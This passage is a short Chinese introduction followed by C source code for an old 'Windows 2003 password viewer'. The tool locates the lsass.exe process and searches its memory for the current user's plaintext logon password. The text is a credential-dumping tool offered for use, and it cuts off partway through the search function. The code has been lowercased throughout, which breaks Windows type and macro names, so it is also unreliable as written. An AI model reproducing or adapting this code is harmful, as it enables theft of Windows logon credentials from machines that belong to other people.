用winhex读取xp和2003下的lsass进程的内存数据,可以读取当前登录用户的明文密码.
source code:
//********************************************************************************
// version: v1.0
// coder: wineggdrop
// date release: 12/15/2004
// purpose: to demonstrate searching logon user password on 2003 box,the method
// used is pretty unwise,but this may be the only way to review the
// logon user's password on windows 2003.
// test platform: windows 2003
// compiled on: vc++ 6.0
//********************************************************************************
#include <stdio.h>
#include <windows.h>
#include <tlhelp32.h>
#define baseaddress 0x002b5000 // the base memory address to search;the password may be located before the address or far more from this address,which causes the result unreliable
char password[max_path] = {0}; // store the found password
// function prototype declaration
//------------------------------------------------------------------------------------------------------
bool findpassword(dword pid);
int search(char *buffer,const uint nsize);
dword getlsasspid();
bool is2003();
//------------------------------------------------------------------------------------------------------
// end of fucntion prototype declaration
int main()
{
dword pid = 0;
printf("windows 2003 password viewer v1.0 by wineggdrop\n\n");
if (!is2003()) // check out if the box is 2003
{
printf("the program can't only run on windows 2003 platform\n");
return -1;
}
pid = getlsasspid(); // get the lsass.exe pid
if (pid == 0) // fail to get pid if returning zerom
{
return -1;
}
findpassword(pid); // find the password from lsass.exe memory
return 0;
}
// end main()
//------------------------------------------------------------------------------------
// purpose: search the memory & try to get the password
// return type: int
// parameters:
// in: char *buffer --> the memory buffer to search
// out: const uint nsize --> the size of the memory buffer
// note: the program tries to locate the magic string "localsystem remote procedure",
// since the password is near the above location,but it's not always true that
// we will find the magic string,or even we find it,the password may be located
// at some other place.we only look for luck
//------------------------------------------------------------------------------------
int search(char *buffer,const uint nsize)
{
uint offset = 0;
uint i = 0;
uint j = 0 ;
uint count = 0;
if (buffer == null)
{
return -1;
}
for (i = 0 ; i < nsize ; i++)
{
/* the below is to find the magic string,why so complicated?that will thank ms.the separation from word to word
is not separated with a space,but with a ending character,so any search api like strstr() will fail to locate
the magic string,we have to do it manually and slowly
*/
if (buffer[i] == 'l')
{
off
